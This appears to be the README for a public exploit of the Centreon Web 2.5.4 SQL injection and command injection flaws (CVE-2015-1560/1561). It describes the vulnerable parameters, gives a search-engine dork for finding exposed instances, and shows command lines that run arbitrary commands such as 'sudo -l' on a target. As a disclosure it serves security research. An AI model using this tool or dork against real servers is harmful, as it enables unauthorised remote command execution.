Centreo(w)n! 💥
An unauthenticated SQL injection vulnerability in the "isUserAdmin" function defined in "include/common/common-Func.php" in Centreon Web 2.5.4 and earlier, allows remote attackers to execute arbitrary SQL command(s) via the "sid" parameter defined in "include/common/XmlTree/GetXmlTree.php". Work only if NDOUtils is installed and acts as Centreon Web's broker.
A command injection vulnerability in the "escape_command" function defined in "include/Administration/corePerformance/getStats.php" in Centreon Web 2.5.4 and earlier uses an incorrect regular expression, which allows remote authenticated users to execute arbitrary commands via shell metacharacters in the "ns_id" parameter.
This exploit works as long as there is a valid "session_id" registered in the "centreon.session" table.
- Huy-Ngoc DAU (@ngocdh) - Deloitte Conseil
- Centreon Web 2.5.4 and earlier
July 8th, 2015
intitle:"Centreon - IT & Network Monitoring" intext:"2004|2005-2008|2009|2010|2011|2012|2013|2014"
$ python CVE-2015-1560-1561.py -r <RHOST> -p <RPORT> -u <URI> -c <CMD> [-s / -ssl]
$ python CVE-2015-1560-1561.py -r 192.168.0.3 -p 80 -u /centreon/ -c "uname -a;id;pwd"
$ python CVE-2015-1560-1561.py -r <RHOST> -p <RPORT> -u <URI> -c <CMD> -i <SESSION_ID> [-s / -ssl]
$ python CVE-2015-1560-1561.py -r 192.168.0.3 -p 80 -u /centreon/ -c "sudo -l" -i a2hlspgh62nd5cuvvpdhmm9r60
- Centreon Web 2.5.4
- Centreon Web 2.5.3
Upgrade Centreon Web.
Usage is provided under the WTFPL license.
See LICENSE for the full details.